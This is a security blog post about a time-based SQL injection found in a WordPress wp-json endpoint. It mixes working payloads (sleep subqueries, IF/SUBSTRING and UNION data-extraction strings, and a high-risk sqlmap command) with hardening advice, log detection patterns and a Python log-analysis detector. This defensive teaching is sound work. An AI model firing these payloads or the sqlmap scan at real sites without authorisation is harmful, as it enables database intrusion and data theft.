Critical Time-Based SQL Injection in WP-JSON Endpoint

Just found one CRITICAL time-based SQL injection on a `wp-json` endpoint using the payload:

'%2b(select*from(select(sleep(10)))a)%2b'

The payload confirms the injection by forcing the database to sleep: if the server's response is delayed by roughly 10 seconds, attacker-supplied input is reaching the SQL query unescaped. (`%2b` is a URL-encoded `+`, so the injected subquery is concatenated straight into the original statement.)

You Should Know:

1. Exploiting Time-Based SQL Injection

To test for time-based SQLi manually:

' OR IF(1=1,SLEEP(10),0)-- -
' OR IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)-- -

Automated testing with sqlmap:

sqlmap -u "https://example.com/wp-json/some-endpoint?param=1" --technique=T --time-sec=10 --risk=3 --level=5

2. WordPress Security Hardening

  • Disable unnecessary REST API endpoints (this shrinks the attack surface; it does not fix an injectable query in a plugin):
    // In a plugin or the theme's functions.php
    add_filter('rest_endpoints', function ($endpoints) {
        // Hide user enumeration from anyone without the admin-level capability.
        // A capability is checked rather than the 'administrator' role name, as WordPress recommends.
        if (!current_user_can('manage_options')) {
            unset($endpoints['/wp/v2/users']);
            unset($endpoints['/wp/v2/users/(?P<id>[\d]+)']);
        }
        return $endpoints;
    });
    
  • Use a Web Application Firewall (WAF) like ModSecurity to block SQLi attempts.

3. Detection & Mitigation

  • Log Monitoring: Check for repeated `sleep()` or `benchmark()` calls in access logs, including their URL-encoded forms (`%28` for `(`). Note that a basic-regex `grep "sleep(.)"` only matches single-digit arguments such as `sleep(5)` and misses `sleep(10)`:
    grep -iE 'sleep(\(|%28)|benchmark(\(|%28)' /var/log/apache2/access.log
    
  • Patch Plugins/Themes: Outdated WordPress components often introduce SQLi flaws.
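As an added example (not part of the original post), a small Python detector that does what the grep above approximates, but properly: it URL-decodes the request target (including double encoding such as `%2527`), strips `/**/` comment padding, looks for the `sleep()`/`benchmark()` primitives named above, and correlates each hit with the response time. It assumes the Apache access log has the `%D` field (response time in microseconds) appended as the last column; the log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Assumes Apache combined log format with "%D" (response time in microseconds)
# as the last field. The four lines below are constructed samples, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2025:12:00:01 +0000] "GET /wp-json/wp/v2/posts?search=hello HTTP/1.1" 200 512 "-" "Mozilla/5.0" 120000
10.0.0.9 - - [10/May/2025:12:00:07 +0000] "GET /wp-json/app/v1/item?id=1'%2b(select*from(select(sleep(10)))a)%2b' HTTP/1.1" 200 88 "-" "curl/8.0" 10004311
10.0.0.9 - - [10/May/2025:12:00:31 +0000] "GET /wp-json/app/v1/item?id=1%2527%2520or%2520benchmark%252810000000%252Cmd5%25281%2529%2529 HTTP/1.1" 200 88 "-" "curl/8.0" 2400000
10.0.0.9 - - [10/May/2025:12:00:45 +0000] "GET /wp-json/app/v1/item?id=1'%20or%20sleep/**/(10)--%20- HTTP/1.1" 200 88 "-" "curl/8.0" 10001000
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d+) \S+ "[^"]*" "[^"]*" (?P<us>\d+)$'
)
# The MySQL delay primitives named on the page, matched after decoding and de-obfuscation.
TIME_SIGS = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)

def normalize(target: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of URL encoding (so %2527 becomes a quote)
    and strip /**/ comment padding so that sleep/**/(10) still matches."""
    s = target
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*.*?\*/", "", s)
    return re.sub(r"\s+", " ", s).lower()

def analyze(log_text: str, slow_ms: int = 5000) -> list:
    """One finding per suspicious /wp-json request. 'confirmed' = a delay primitive
    was sent AND the server took that long to answer (strongest sign the injected
    SQL actually ran); 'attempted' = payload seen, no matching delay."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or "/wp-json" not in m["target"]:
            continue
        norm = normalize(m["target"])
        has_sig = bool(TIME_SIGS.search(norm))
        ms = int(m["us"]) // 1000
        if has_sig:
            verdict = "confirmed" if ms >= slow_ms else "attempted"
        elif ms >= slow_ms:
            verdict = "slow"  # no known payload, but a delay worth a second look
        else:
            continue
        findings.append({"ip": m["ip"], "verdict": verdict, "ms": ms, "decoded": norm})
    return findings
```

Run `analyze(SAMPLE_LOG)` on the constructed lines and the benign search request is skipped, while the three payloads come back as confirmed, attempted and confirmed respectively.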

4. Advanced Exploitation

Extract database information with time delays:

' UNION SELECT IF(SUBSTRING(user(),1,4)='root',SLEEP(10),NULL),NULL,NULL-- -

5. Defensive Commands

  • Linux Log Analysis:
    journalctl -u apache2 --since "1 hour ago" | grep -i "sql"
    
  • Windows Event Log (PowerShell):
    # Event ID 4625 = failed logon; -like needs wildcards or it only matches the literal string "sql"
    Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4625} | Where-Object { $_.Message -like "*sql*" }
    

What Undercode Says

Time-based SQLi remains a stealthy threat, bypassing traditional error-based detection. Always:
– Parameterize every query that includes user input with prepared statements rather than relying on input sanitization.
– Limit API access via .htaccess:

# wp-json is a rewritten route served by index.php, not a file on disk,
# so a <Files> block never matches it; test the request URI instead.
# Requests can also reach the API via ?rest_route=, which this rule does not cover.
RewriteEngine On
RewriteCond %{REQUEST_URI} ^/wp-json(/|$)
RewriteCond %{REMOTE_ADDR} !^192\.168\.1\.
RewriteRule ^ - [F,L]

– Automate scanning with Burp Suite or OWASP ZAP.

Expected Output:

A secured WordPress REST API with:

  • No delayed responses to crafted SQL payloads.
  • WAF rules blocking sleep(), benchmark(), and union queries.
  • Regular audits via:
    nikto -h https://example.com/wp-json -C all
    

Prediction

As WordPress evolves, attackers will shift to blind SQLi in REST APIs. Future exploits may combine JSON hijacking with time-based delays, demanding stricter CSP headers and API rate-limiting.


Reported By: Kunal Dhumal – Hackers Feeds
